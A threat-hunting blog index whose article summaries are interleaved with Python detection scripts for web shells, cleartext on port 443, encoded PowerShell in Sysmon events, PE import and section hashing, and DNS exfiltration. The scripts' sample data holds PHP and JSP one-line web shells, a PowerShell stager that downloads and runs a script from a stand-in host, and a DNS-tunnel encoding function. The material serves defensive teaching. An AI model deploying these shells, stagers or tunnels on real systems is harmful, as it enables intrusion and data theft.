Threat Hunting Articles (32)

Make Your Incident Response and Threat Hunting Easier With Powershell Hunting Tools

Kansa is a modular incident response framework written in PowerShell. It can be used across an enterprise to collect data for incident response, breach hunts and environment baselining. In this post we examine some PowerShell-based tools designed to collect and scan large amounts of data for incident response and threat hunting.

Understanding Threat Intelligence: Feed Evaluation

In this blog post we look at how to evaluate threat intelligence feeds more effectively, and at the specific criteria worth weighing when doing so.

A General Overview of Threat Intelligence Requirements

In this blog post we look at the characteristics of a good intelligence requirement and why establishing intelligence requirements matters.

What is an Indicator of Compromise (IOC)

This blog post explains what an indicator of compromise (IOC) is, the lifecycle of an indicator, and the Traffic Light Protocol (TLP) used to mark how widely an indicator may be shared.

Structured Threat Information Expression (STIX)

Structured Threat Information Expression (STIX) is a standardized language for exchanging threat intelligence data. It was originally developed by MITRE through a community process and is now maintained by the OASIS Cyber Threat Intelligence (CTI) technical committee.

Threat Modeling Basics: System Modeling

In this blog post we explain what system modeling is and why it is an essential part of threat modeling, starting with a definition of threat modeling itself.

A General Overview of Threat Modeling Workflow

The threat modeling activity follows a consistent plan that can be broken down into a handful of basic elements. In this blog post we give a basic outline of a threat modeling process.

Threat Hunting: SIEM, ELK Stack, Splunk

In this article we discuss common tools used in threat hunting, SIEM platforms, the ELK stack and Splunk, together with the data source that feeds them. System Monitor (Sysmon), a tool from Sysinternals, is a Windows system service and device driver that remains resident across reboots to monitor and log system activity to the Windows event log. It provides detailed information about process creation, network connections and changes to file creation timestamps. By collecting the events it generates with Windows Event Collection or SIEM agents and then analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on the network.

Threat Hunting: Windows Event Logs

Even though we were aware of event logs during the Windows XP era, we rarely referred to them. Users were intimidated by the amount of information they had to sift through to determine the source of a software or hardware issue. As the popularity of incident response grew, so did the use of event logs. The incident response procedure demonstrated that these operating system artifacts were an invaluable source of information for determining what actions had occurred on a machine, so event logs came to be viewed less as a troubleshooting tool and more for what they were intended to be. Windows Event Logs are a feature of all Windows editions. They allow us to audit and monitor software and hardware events occurring on the system. These events originate from a variety of sources, including applications and the operating system itself, and all of them are recorded in a collection called the event log.

Introduction to Malware Endpoint hunting

Imagine at this stage that threat intelligence feeds are in place and network traffic and flow data are being monitored, but nothing is producing warnings that warrant further investigation. That does not mean the attacker has not gained access to the network. They most likely got past the perimeter not by breaking it but by going around it: perhaps an employee's laptop was compromised at home or in a nearby coffee shop, and the adversary rode it into the heart of the organization. To be successful as a hunter, you must assume the adversary is already inside and that your job is to locate them. In this article we concentrate on locating malware on endpoints.

Malware hunting: Detection tools

Malware will not disappear anytime soon. To remain undetected for as long as possible, malware authors employ a variety of tools and methods, so we too need a variety of tools and techniques to find them. Whether we are searching for a Meterpreter session or an injected DLL, we should have an abundance of tools available. In this article we examine a variety of tools that aid the search for malware on endpoints and across the network.

Hunting Webshells: Tools

In this article we discuss tools that can be used to discover web shells.

Hunting Webshells: Linux and Windows Commands

Log analysis is one of the techniques used to hunt for web shells on web servers (Apache, IIS, etc.). This article concentrates on the Linux and Windows commands used in that hunt rather than on detailed log analysis.

Intro to Hunting Webshells

A web shell is a script that can be uploaded to a web server to provide remote administration of the machine. Internal or Internet-facing web servers can be infected, and the web shell is then used to pivot to internal hosts.
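The three web shell posts above describe two complementary approaches: looking at the scripts on disk and looking at how they are requested. The script below is an added example (not code from the articles) that does both over constructed data: a content scan using signatures drawn from common PHP/ASPX/JSP shells, and an Apache combined-format access-log scan for the classic shell footprint, a script that only one or two clients ever POST to, always without a Referer. File paths, IP addresses and log lines are invented for the demonstration.

```python
"""Hunt web shells by file content and by access-log behaviour (added example; sample data is constructed)."""
import re
from collections import defaultdict

# Source-level indicators drawn from common PHP, ASPX and JSP web shells.
CONTENT_SIGS = {
    "php-eval-decode": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "php-exec-from-request": re.compile(
        r"(?:system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "php-assert-request": re.compile(r"assert\s*\(\s*\$_(?:GET|POST|REQUEST)\b", re.I),
    # preg_replace() with the /e modifier evaluates the replacement as PHP (removed in PHP 7, still seen in old shells).
    "php-preg-replace-e": re.compile(r"preg_replace\s*\(\s*['\"].*?/[a-z]*e[a-z]*['\"]", re.I),
    "aspx-process-start": re.compile(r"Process\.Start\s*\(|ProcessStartInfo", re.I),
    "jsp-runtime-exec": re.compile(r"Runtime\.getRuntime\(\)\.exec", re.I),
}

def scan_content(text):
    """Return the names of the signatures that match a script's source."""
    hits = [name for name, rx in CONTENT_SIGS.items() if rx.search(text)]
    if hits and len(text) < 200:
        hits.append("one-liner")  # tiny file that still executes input: the classic minimal shell
    return hits

def scan_files(files):
    """files: {path: source}. Returns only the paths that raised at least one hit."""
    return {path: hits for path, hits in ((p, scan_content(t)) for p, t in files.items()) if hits}

# Apache/nginx combined log format: client ident user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"')

def hunt_access_log(lines, min_requests=3):
    """Flag script paths that are (almost) only POSTed to, by <=2 clients, never with a Referer."""
    per_path = defaultdict(lambda: {"clients": set(), "posts": 0, "total": 0, "no_referer": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, _status, referer, _ua = m.groups()
        path = path.split("?", 1)[0]
        if not path.lower().endswith((".php", ".asp", ".aspx", ".jsp")):
            continue
        s = per_path[path]
        s["clients"].add(client)
        s["total"] += 1
        s["posts"] += method == "POST"
        s["no_referer"] += referer == "-"
    suspects = [
        path for path, s in per_path.items()
        if s["total"] >= min_requests
        and s["posts"] / s["total"] >= 0.8
        and len(s["clients"]) <= 2
        and s["no_referer"] == s["total"]
    ]
    return sorted(suspects)

# Constructed sample files and log lines (not real evidence).
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php echo 'Hello'; include 'lib.php'; ?>",
    "/var/www/html/uploads/img.php": "<?php @eval(base64_decode($_POST['x'])); ?>",
    "/var/www/html/lib.php": "<?php function clean($s) { return preg_replace('/\\s+/', ' ', $s); } ?>",
    "/var/www/html/admin/tool.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
}
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [01/Mar/2024:10:00:00 +0000] "POST /uploads/img.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Mar/2024:10:00:05 +0000] "POST /uploads/img.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Mar/2024:10:00:09 +0000] "POST /uploads/img.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [01/Mar/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [01/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 2048 "https://www.example.com/" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Mar/2024:10:01:04 +0000] "POST /login.php HTTP/1.1" 302 0 "https://www.example.com/login.php" "Mozilla/5.0"',
    '198.51.100.5 - - [01/Mar/2024:10:01:06 +0000] "POST /login.php HTTP/1.1" 302 0 "https://www.example.com/login.php" "Mozilla/5.0"',
    '198.51.100.6 - - [01/Mar/2024:10:01:08 +0000] "POST /login.php HTTP/1.1" 302 0 "https://www.example.com/login.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("content hits:", scan_files(SAMPLE_FILES))
    print("log suspects:", hunt_access_log(SAMPLE_ACCESS_LOG))
```

The two views catch different things: the content scan misses a shell that is obfuscated beyond the signature set, while the log scan misses a shell the attacker only ever opens via GET with a forged Referer. A real hunt runs both and treats a path that appears in both lists as a priority; the thresholds (three requests, two clients) are starting points to tune against the site's own traffic, since a legitimate API endpoint called by one monitoring host looks similar in the log.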

Stay One Step Ahead of the Hackers by Hunting Suspicious Traffic

It is essential to understand what is normal in order to recognize what is not, such as a connection to port 443 carrying cleartext traffic. No one can examine hundreds of thousands of packets per day by hand at a workstation, so when malicious traffic crosses our hunting grounds we rely on a variety of enterprise and open-source tools to help with the task and, ideally, to capture a substantial amount of it. In this article we discuss how to recognize normal network traffic when analyzing packets. The purpose is to train your eye for the times you are required to inspect live or saved network traffic (PCAP).
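The "cleartext on port 443" case above is worth seeing in bytes. The script below is an added example, not code from the article: it classifies the first client payload of a flow by what a TLS session actually starts with (a record header of content type 0x16 and version 0x03 0x0X wrapping a ClientHello) and pulls the SNI host name out of the ClientHello, so a hunt over port 443 can flag plain HTTP, interactive shells and TLS sessions that name no server. The ClientHello builder and the flows are constructed sample data, and the 203.0.113.x addresses are documentation ranges, not real hosts.

```python
"""Classify port-443 payloads as TLS or not and extract SNI (added example; sample traffic is constructed)."""
import struct

def build_client_hello(sni=None):
    """Constructed minimal TLS 1.2 ClientHello used as sample traffic (no real key material)."""
    body = b"\x03\x03" + b"\x00" * 32            # client_version, random
    body += b"\x00"                               # empty session_id
    body += b"\x00\x02\xc0\x2f"                   # one cipher suite
    body += b"\x01\x00"                           # null compression
    exts = b""
    if sni is not None:
        name = sni.encode()
        entry = b"\x00" + struct.pack("!H", len(name)) + name     # name_type=host_name, name
        lst = struct.pack("!H", len(entry)) + entry               # server_name list
        exts += b"\x00\x00" + struct.pack("!H", len(lst)) + lst   # extension type 0 = server_name
    body += struct.pack("!H", len(exts)) + exts
    hs = b"\x01" + len(body).to_bytes(3, "big") + body            # handshake type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs      # TLS record: handshake, version 3.1

def client_hello_sni(payload):
    """Return the server_name from a ClientHello record, or None if absent/unparseable."""
    if len(payload) < 6 or payload[0] != 0x16:
        return None
    hs = payload[5:]
    if hs[0] != 0x01:
        return None
    p = 4 + 2 + 32                                  # handshake header, version, random
    if len(hs) < p + 1:
        return None
    p += 1 + hs[p]                                  # session_id
    if len(hs) < p + 2:
        return None
    p += 2 + struct.unpack("!H", hs[p:p + 2])[0]    # cipher_suites
    if len(hs) < p + 1:
        return None
    p += 1 + hs[p]                                  # compression_methods
    if len(hs) < p + 2:
        return None
    ext_len = struct.unpack("!H", hs[p:p + 2])[0]
    p += 2
    end = min(p + ext_len, len(hs))
    while p + 4 <= end:
        etype, elen = struct.unpack("!HH", hs[p:p + 4])
        p += 4
        if etype == 0 and elen >= 5:
            name_len = struct.unpack("!H", hs[p + 3:p + 5])[0]   # skip list_len(2), name_type(1)
            return hs[p + 5:p + 5 + name_len].decode("ascii", "replace")
        p += elen
    return None

def classify(payload):
    """Coarse label for the first bytes a client sends."""
    if len(payload) < 5:
        return "short"
    ctype, vmaj, vmin = payload[0], payload[1], payload[2]
    if ctype == 0x16 and vmaj == 3 and vmin <= 4 and len(payload) > 5 and payload[5] == 0x01:
        return "tls-clienthello"
    if ctype in (0x14, 0x15, 0x16, 0x17) and vmaj == 3 and vmin <= 4:
        return "tls-record"
    if any(payload.startswith(m) for m in (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"HTTP/1.")):
        return "http-cleartext"
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload) / len(payload)
    return "cleartext-other" if printable > 0.9 else "binary-unknown"

def hunt(flows, dport=443):
    """flows: (src, dst, dport, first_client_payload). Flag non-TLS on 443 and TLS without SNI."""
    alerts = []
    for src, dst, port, payload in flows:
        if port != dport:
            continue
        kind = classify(payload)
        if kind != "tls-clienthello":
            alerts.append((src, dst, kind))
        elif client_hello_sni(payload) is None:
            alerts.append((src, dst, "tls-no-sni"))
    return alerts

# Constructed flows: one normal TLS session, plain HTTP on 443, an interactive shell on 443, TLS with no SNI, normal HTTP on 80.
SAMPLE_FLOWS = [
    ("10.0.0.5", "203.0.113.5", 443, build_client_hello("www.example.com")),
    ("10.0.0.7", "203.0.113.9", 443, b"GET /update.txt HTTP/1.1\r\nHost: 203.0.113.9\r\n\r\n"),
    ("10.0.0.9", "203.0.113.23", 443, b"id\nuname -a\n"),
    ("10.0.0.11", "203.0.113.40", 443, build_client_hello(None)),
    ("10.0.0.5", "203.0.113.5", 80, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_FLOWS):
        print(alert)
```

Two caveats a hunter should carry into this: a missing SNI is a lead, not a verdict (some clients and IP-literal connections omit it, and Encrypted Client Hello hides it by design), and the check only sees the first client bytes, so a C2 channel that starts with a genuine TLS handshake and misbehaves later needs a different hunt, such as JA3/JA4 fingerprints or beaconing analysis on the flow timing.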

Threat Hunting Concepts: Adversary Behavioral Identification for Predicting Attacks

Adversary behavioral identification is about predicting attacks: identifying the tactics and techniques an adversary typically uses to attack a target network. It helps security teams design more secure network infrastructure and choose the security controls that prevent those attacks.

Analyzing malicious code without reverse engineering the assembly

When evaluating malicious code, threat hunters have various tools to aid their investigation. One way to understand the behavior of a suspicious file is to disassemble it, but not everyone has the time or ability to learn assembly well enough to comprehend a binary's function. By looking up the Windows API functions the sample imports on Microsoft's technical documentation site and mapping them to the malware's likely capabilities, a threat hunter can make a more informed decision about what a suspicious file does.

Fileless Malware: a New Type of Malware That Doesn't Rely on Executable Files

Fileless malware is a type of malware that does not rely on a traditional executable file to infect a system. Instead, it uses existing system files and resources to carry out its malicious activity, typically scripting engines such as PowerShell or VBScript that execute the malicious code. The code is loaded directly into memory, evading security solutions that focus on scanning files on disk. The name is slightly misleading, though: such malware usually still leaves a foothold somewhere, such as a registry run key, a scheduled task or a WMI event subscription that relaunches the script, so those persistence locations and the command lines of the scripting hosts are where the hunt normally starts.
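The Sysmon and Windows event log posts above feed directly into hunting the fileless tradecraft just described: Sysmon Event ID 1 records every process creation with its full command line and parent, and an encoded PowerShell command launched by an Office application is one of the clearest signals in that data. The script below is an added example, not code from the articles. It parses Sysmon-style XML, decodes the base64/UTF-16LE payload behind -EncodedCommand (PowerShell accepts any unambiguous prefix, so -e, -ec and -enc all work) and scores each event against a short list of indicators. The three events and the staged URL are constructed for the demonstration.

```python
"""Hunt encoded / fileless PowerShell in Sysmon Event ID 1 records (added example; sample events are constructed)."""
import base64
import re
import xml.etree.ElementTree as ET

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64 of UTF-16LE text.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings that usually mean "download and run in memory" once the command is visible.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
                     "reflection.assembly", "-w hidden", "-windowstyle hidden", "-nop")

def _local(tag):
    """Strip the XML namespace Sysmon puts on every element."""
    return tag.rsplit("}", 1)[-1]

def parse_event(xml_text):
    """Flatten one Sysmon event into {'EventID': ..., 'Image': ..., 'CommandLine': ..., 'ParentImage': ...}."""
    fields = {}
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "EventID":
            fields["EventID"] = (el.text or "").strip()
        elif name == "Data" and el.get("Name"):
            fields[el.get("Name")] = el.text or ""
    return fields

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(xml_text):
    """Score one process-creation event; findings is empty for anything that looks ordinary."""
    ev = parse_event(xml_text)
    findings = []
    if ev.get("EventID") != "1":
        return {"findings": findings}
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if image in ("powershell.exe", "pwsh.exe"):
        if decoded is not None:
            findings.append("encoded command")
        if parent in OFFICE_PARENTS:
            findings.append(f"spawned by {parent}")
        haystack = (cmd + " " + (decoded or "")).lower()
        findings += [f"token:{t}" for t in SUSPICIOUS_TOKENS if t in haystack]
    return {"image": image, "parent": parent, "decoded": decoded, "findings": findings}

def hunt(events):
    """Return the analyses that raised at least one finding."""
    return [a for a in (analyze(e) for e in events) if a["findings"]]

# Constructed sample data: the stager text is encoded here exactly as an attacker would encode it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

def _event(image, parent, cmdline):
    """Build a Sysmon Event ID 1 record with the field names Sysmon actually writes."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">{image}</Data>
    <Data Name="CommandLine">{cmdline}</Data>
    <Data Name="ParentImage">{parent}</Data>
  </EventData>
</Event>"""

SAMPLE_EVENTS = [
    _event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
           f"powershell.exe -NoP -W Hidden -enc {ENCODED}"),
    _event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           r"C:\Windows\System32\svchost.exe",
           r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    _event(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["parent"], "->", hit["image"], hit["findings"])
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

The decode step matters more than the token list: attackers rely on defenders not reading the base64, and once it is UTF-16LE text the same search terms you would use on a script file apply. Security event 4688 with command-line auditing enabled carries the same fields (NewProcessName, CommandLine, ParentProcessName) and can be fed to the same logic with a small change to parse_event; Script Block Logging (event 4104) then gives the code that actually ran, including anything the stager pulled down.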

Using YARA for Threat Hunting in Enterprise Environments

Yara is a powerful tool that lets forensic and malware analysts search within artifacts discovered during an investigation. It allows fine-grained matching on strings, on byte patterns at specific offsets within an executable, on PE header fields such as the compile timestamp (through its pe module), and on dozens of other criteria. Previous articles have discussed Yara and demonstrated some of its capabilities (see Introduction to Yara Part I and Introduction to Yara Part II). Threat hunters also use Yara to search for indicators of compromise (IOCs) that support or refute their hypothesis, drawing those IOCs from threat intelligence reports, malware analysis reports, or their own knowledge of a specific malware family.

Detecting exfiltration over network protocols

Data exfiltration (exfil) is the transfer of data out of the organization without authorization. It can be done in a number of ways, including using protocols in unintended ways to smuggle data inside fields of the traffic stream. By understanding how protocols work and what data is supposed to appear in each field, a threat hunter is better placed to identify threat actors who are trying to steal, or have already stolen, sensitive information.

Fuzzy Hashing, Import Hashing and Section Hashing

In a previous post we looked at a variety of methods for tracking and recognizing malware samples, including cryptographic hashes, fuzzy hashes and YARA rules. Threat actors, however, constantly change their binaries, and a hash of the whole file stops matching after even a trivial rebuild. Import hashing (imphash) and section hashing target the parts of a PE file that change far less often, the import table and the individual sections, so recompiled or lightly modified variants can still be linked to each other.
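What "hashing only the part that stays the same" means in practice, as an added example rather than code from the post: imphash follows the convention pefile popularised (lower-case dll.function pairs in import-table order, DLL extension stripped, ordinals written as ordN, joined by commas, MD5), and section hashing walks the COFF section table and hashes each section's raw bytes. The two sample binaries are constructed minimal PE images built by the script itself, differing only in the C2 string in .rdata; the import list is likewise invented, since pulling it out of a real file needs an import-directory parser such as pefile.

```python
"""Import hashing and section hashing for PE files (added example; the two sample PEs are constructed)."""
import hashlib
import struct

def imphash(imports):
    """imports: [(dll_name, [function_name or ordinal_int, ...]), ...] in import-table order.

    Convention: lower-case, strip .dll/.ocx/.sys, ordinals as 'ordN', 'dll.func' joined by commas, MD5.
    (pefile additionally maps well-known ordinals, e.g. ws2_32, back to names before hashing.)
    """
    parts = []
    for dll, funcs in imports:
        base = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if base.endswith(ext):
                base = base[: -len(ext)]
                break
        for f in funcs:
            name = f"ord{f}" if isinstance(f, int) else f.lower()
            parts.append(f"{base}.{name}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()

def section_hashes(pe):
    """Return (TimeDateStamp, {section_name: sha256_of_raw_bytes}) by walking the COFF section table."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    _machine, nsec, timestamp, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    off = e_lfanew + 24 + opt_size                      # section table follows the optional header
    hashes = {}
    for _ in range(nsec):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        hashes[name] = hashlib.sha256(pe[raw_ptr:raw_ptr + raw_size]).hexdigest()
        off += 40                                       # IMAGE_SECTION_HEADER is 40 bytes
    return timestamp, hashes

def compare_sections(pe_a, pe_b):
    """Which sections are identical between two builds and which changed."""
    _, a = section_hashes(pe_a)
    _, b = section_hashes(pe_b)
    names = sorted(set(a) | set(b))
    return {"same": [n for n in names if a.get(n) == b.get(n)],
            "changed": [n for n in names if a.get(n) != b.get(n)]}

def build_pe(sections, timestamp=0x5F000000):
    """Constructed minimal PE: DOS header, 'PE\\0\\0', COFF header, no optional header, section table, raw data."""
    n = len(sections)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, timestamp, 0, 0, 0, 0x102)
    offset = 64 + 4 + 20 + 40 * n                        # raw data starts right after the headers
    table, data = b"", b""
    for idx, (name, raw) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw),
                             0x1000 * (idx + 1), len(raw), offset, 0, 0, 0, 0, 0x60000020)
        data += raw
        offset += len(raw)
    return bytes(dos) + b"PE\0\0" + coff + table + data

# Constructed samples: same code, the operator only changed the C2 address in .rdata.
IMPORTS = [("KERNEL32.dll", ["CreateFileW", "WriteFile", "VirtualAlloc"]), ("WS2_32.dll", [115, "connect"])]
SAMPLE_A = build_pe([(".text", b"\x55\x8b\xec" * 40), (".rdata", b"http://203.0.113.10/c2\0")])
SAMPLE_B = build_pe([(".text", b"\x55\x8b\xec" * 40), (".rdata", b"http://198.51.100.7/c2\0")])

if __name__ == "__main__":
    print("imphash:", imphash(IMPORTS))
    print("whole-file A/B equal:", hashlib.sha256(SAMPLE_A).digest() == hashlib.sha256(SAMPLE_B).digest())
    print("sections:", compare_sections(SAMPLE_A, SAMPLE_B))
```

Note what each hash is sensitive to: imphash changes when the compiler reorders or adds imports, so two families built with the same toolchain template can collide, while a packer hides the real import table entirely and gives every packed sample the packer's imphash. Section hashes survive the .rdata edit above but not a rebuild that changes code layout. On real files, pefile's PE(path).get_imphash() and the sections list give the same inputs this example constructs by hand.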

YARA: A powerful Malware Analysis Tool for Detecting IOC's - Part 2

In a previous article we discussed YARA rules, syntax and IOC’s. Let’s continue our acquaintance with YARA rules!

YARA: A powerful Malware Analysis Tool for Detecting IOC's - Part 1

There has been a lot of research over the years into improving detection, and researchers have come up with many novel methods and methodologies. Each has its own advantages and disadvantages, so we cannot claim that one is always preferable to another: some are better suited to one task than to another. For that reason many businesses end up running a hybrid of several.

Threat Hunting in Distributed Organizations: The Challenges are not Insurmountable

Threat hunting in a distributed organization presents some unique challenges, including gathering data from all applicable devices, having access to every device relevant to the hunt being performed, and running hunts tailored to each remote site when applicable.

Proactive Cyber Security with Approaches to Threat Hunting

Proactive searching for malicious activity on a company's networks is known as threat hunting. It is a crucial part of an organization's security, and more companies are starting to invest in it. Threat hunting's goal is to find threats before they cause damage, which requires specific methodologies. It is a time-consuming procedure, but it is critical for any firm that wants to stay ahead of the cybersecurity curve.

Train Threat Hunters and Develop your Threat Hunting Program with Threat Emulation

Organizations are under constant attack from sophisticated cyber adversaries. To defend against these threats, security teams must employ threat hunting techniques to identify and neutralize them. One such technique is threat emulation, which involves replicating an adversary’s behavior to understand their methods better, detect their behavior, and develop mitigating controls to block their attacks.

Email: Another Source for Data Exfiltration

When a data exfiltration occurs, the cyber threat hunt may begin by examining public web servers, databases and file servers. Those are obvious first choices because of their accessibility from the internet and from within the organization. Knowing the type of data exfiltrated can provide clues on where to begin the hunt, assuming the organization knows where all of its data is located. Insight into the type of data leaked and where it is stored can help generate a hypothesis to begin the hunt. Another service that should be on that list is email.

Improve Efficiency by Generating a Hypothesis Before Beginning a Threat Hunt

Threat hunting can be a daunting task. It can be difficult to know where to start, or what tools to use. One way to make the process easier is to generate a hypothesis before beginning your hunt. This will help you focus on specific areas, and make sure that you are looking for the right things.

The Right Team can keep Small Businesses Safe from Disaster

Threat hunting may seem like a process that only large organizations need. Small businesses may feel they are not a target of cyberattacks, so convincing them to invest in routine threat hunting may be difficult. According to the Small Business Administration, “88% of small business owners felt their business was vulnerable to a cyber-attack”. Hiscox insurance found that for micro firms of fewer than ten employees, “the median cost of all attacks this year [2021] was just over $8,000. But at the 95th percentile and beyond there were firms suffering losses of $308,000. Some encountered still worse outcomes. One German business services firm experienced breaches costing the equivalent of $474,000 per employee.” They also found that some firms were attacked multiple times within a single year. Despite these statistics, small business owners continue to operate with the false sense of security that their business is too small to be a target.

Don't Overlook DNS in your Threat Hunting Arsenal

DNS is a service that can provide valuable evidence of whether an organization has been compromised. For it to support threat hunting, the resolver must be configured to log each query together with the source IP of the host that made it. Once logging is enabled, a number of questions can be asked and answered with a SIEM or a script.
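The exfiltration post above and this DNS post meet in one concrete case, data tunnelled out in the QNAME field of DNS queries, so one added example serves both; it is not code from either article. The first function shows what the sender side does (chunk the payload into subdomain labels of an attacker-controlled zone; hex here, base32 and base64 variants are common), and the hunt runs over resolver query logs for the footprint that leaves: one client, one domain, many unique high-entropy labels, often with TXT or NULL queries for the downstream channel. The log layout ("timestamp client qtype qname"), the 10.0.0.x clients and the exfil-example.net zone are all constructed; for BIND query logs, the Windows DNS analytic log or Zeek's dns.log only parse_line() changes.

```python
"""Spot data leaving over DNS from resolver query logs (added example; log lines are constructed)."""
import hashlib
import math
from collections import defaultdict

def chunk_to_queries(data, domain, label_len=30):
    """Sender side of a simple DNS tunnel: hex-encode the payload and split it into <=63-char labels."""
    h = data.hex()
    return [f"{h[i:i + label_len]}.{domain}" for i in range(0, len(h), label_len)]

def shannon_entropy(s):
    """Bits per character; 'www' scores 0, random hex scores close to 4."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def parse_line(line):
    """Constructed layout: '<timestamp> <client ip> <qtype> <qname>'. Adapt for BIND/Windows/Zeek logs."""
    _ts, client, qtype, qname = line.split()
    return client, qtype.upper(), qname.rstrip(".").lower()

def registered_domain(qname):
    """Naive: last two labels. Use the public suffix list in production (co.uk, com.au, ...)."""
    return ".".join(qname.split(".")[-2:])

def hunt(lines, min_unique=20, min_entropy=2.5):
    """Aggregate per (client, registered domain) and flag tunnel-shaped query patterns."""
    stats = defaultdict(lambda: {"labels": set(), "entropy": [], "chars": 0, "types": set()})
    for line in lines:
        if not line.strip():
            continue
        client, qtype, qname = parse_line(line)
        domain = registered_domain(qname)
        prefix = qname[: -len(domain) - 1] if qname != domain else ""
        s = stats[(client, domain)]
        s["types"].add(qtype)
        if prefix:
            s["labels"].add(prefix)
            s["chars"] += len(prefix.replace(".", ""))
            s["entropy"].append(shannon_entropy(prefix.split(".")[0]))   # leftmost label carries the data
    alerts = []
    for (client, domain), s in stats.items():
        mean_entropy = sum(s["entropy"]) / len(s["entropy"]) if s["entropy"] else 0.0
        reasons = []
        if len(s["labels"]) >= min_unique and mean_entropy >= min_entropy:
            reasons.append("many unique high-entropy subdomains")
        if s["types"] & {"TXT", "NULL"}:
            reasons.append("TXT/NULL queries")
        if reasons:
            alerts.append({"client": client, "domain": domain,
                           "unique_labels": len(s["labels"]),
                           "mean_entropy": round(mean_entropy, 2),
                           "approx_bytes_out": s["chars"] // 2,   # hex: two characters per byte
                           "reasons": reasons})
    return alerts

# Constructed data. Tunnels normally compress or encrypt before encoding, so the payload is
# modelled as pseudo-random bytes derived from hashes rather than readable text.
SECRET = b"".join(hashlib.sha256(b"constructed-row-%d" % i).digest() for i in range(16))
BENIGN_LINES = [
    "2024-03-01T10:00:01Z 10.0.0.5 A www.example.com",
    "2024-03-01T10:00:02Z 10.0.0.5 AAAA www.example.com",
    "2024-03-01T10:00:03Z 10.0.0.5 A mail.example.com",
    "2024-03-01T10:00:04Z 10.0.0.7 A cdn.example.net",
    "2024-03-01T10:00:05Z 10.0.0.7 A static.example.net",
]
EXFIL_LINES = [f"2024-03-01T10:01:{i % 60:02d}Z 10.0.0.9 A {q}"
               for i, q in enumerate(chunk_to_queries(SECRET, "exfil-example.net"))]
EXFIL_LINES.append("2024-03-01T10:02:00Z 10.0.0.9 TXT cmd.exfil-example.net")
SAMPLE_LINES = BENIGN_LINES + EXFIL_LINES

if __name__ == "__main__":
    for alert in hunt(SAMPLE_LINES):
        print(alert)
```

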